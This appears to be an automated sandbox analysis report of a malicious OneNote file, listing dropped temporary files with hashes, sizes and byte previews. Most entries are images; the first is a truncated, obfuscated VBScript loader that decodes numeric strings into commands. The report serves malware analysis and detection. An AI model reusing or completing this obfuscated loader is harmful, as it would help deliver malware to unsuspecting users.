                                                                                                  Preview:<job id="clockwork">..<script language="VBScript">..talkedy = talkedy + ("\ocw11934\ocw11628\ocw11016\ocw10098\ocw11322\ocw11934\ocw11220\ocw11832\ocw6222\ocw4998\ocw1326")..downstairsy = "downstairsy"..wittyy = wittyy + ("bjszvm\ocwfalsefreshybarbarouslyydistrustedyfreshy")..aptenty = "aptenty"..unfortunatebuty = mid(wittyy,7,4)..'partingypartingy..solelyy = Split(talkedy,unfortunatebuty,-1,0)..barbeledy = "barbeledy"..for volutpaty = 1 to Ubound(solelyy)...consultedy = consultedy & chr(Clng(solelyy(volutpaty)) / 102)..Next..'barbeledybarbeledy..talkedy = talkedy + ("\ocw11730\ocw10302\ocw11832\ocw3264\ocw10404\ocw11730\ocw11322\ocw9996\ocw10812\ocw10302\ocw10098\ocw11832\ocw6222\ocw10098\ocw11628\ocw10302\ocw9894\ocw11832\ocw10302\ocw11322\ocw9996\ocw10812\ocw10302\ocw10098\ocw11832\ocw4080\ocw3468\ocw11730\ocw10098\ocw11628\ocw10710\ocw11424\ocw11832\ocw10710\ocw11220\ocw10506\ocw4692\ocw10404\ocw10710\ocw11016\ocw10302\ocw11730\ocw12342\ocw11730\ocw11832\ocw10302\ocw11118\ocw11322\

                                                                                                  C:\Users\user\AppData\Local\Temp\{681E55BE-4EA9-45EC-87A7-5838242F5572}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Temp\{6AB97F70-19DC-4D66-A016-FA92E89BDA1E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{6C79191F-679B-47B3-87EC-B8A248B334F2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Temp\{6C9C7B8A-CB84-4202-AEC7-8B75A7F5B879}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Temp\{6CEB0516-8E70-4978-A508-9294F403FA64}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{6D889215-DCE8-43FC-B573-5EC1AB84924A}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{6DAE5E1D-2390-45D2-90AB-8A7A28EF8C01}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Temp\{6EDD2716-0987-475F-B7AB-61B6DB56923E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Temp\{6F0A1A33-EB6A-480F-A6C8-E8E5804AADA9}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):515
                                                                                                  Entropy (8bit):6.740133870626016
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                  MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                  SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                  SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                  SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{707E7C9C-AC96-4A31-9653-C698960C5AC5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15740
                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                  C:\Users\user\AppData\Local\Temp\{71F7F5F8-2DEC-48AA-90F5-345FF80CCD76}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25622
                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                  C:\Users\user\AppData\Local\Temp\{730BF7D7-8378-4737-A484-B5A45E1E2AA5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):49224
                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                  Malicious:false
                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                  C:\Users\user\AppData\Local\Temp\{73668B79-D911-4B9E-AAFE-900C3F40D0D3}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
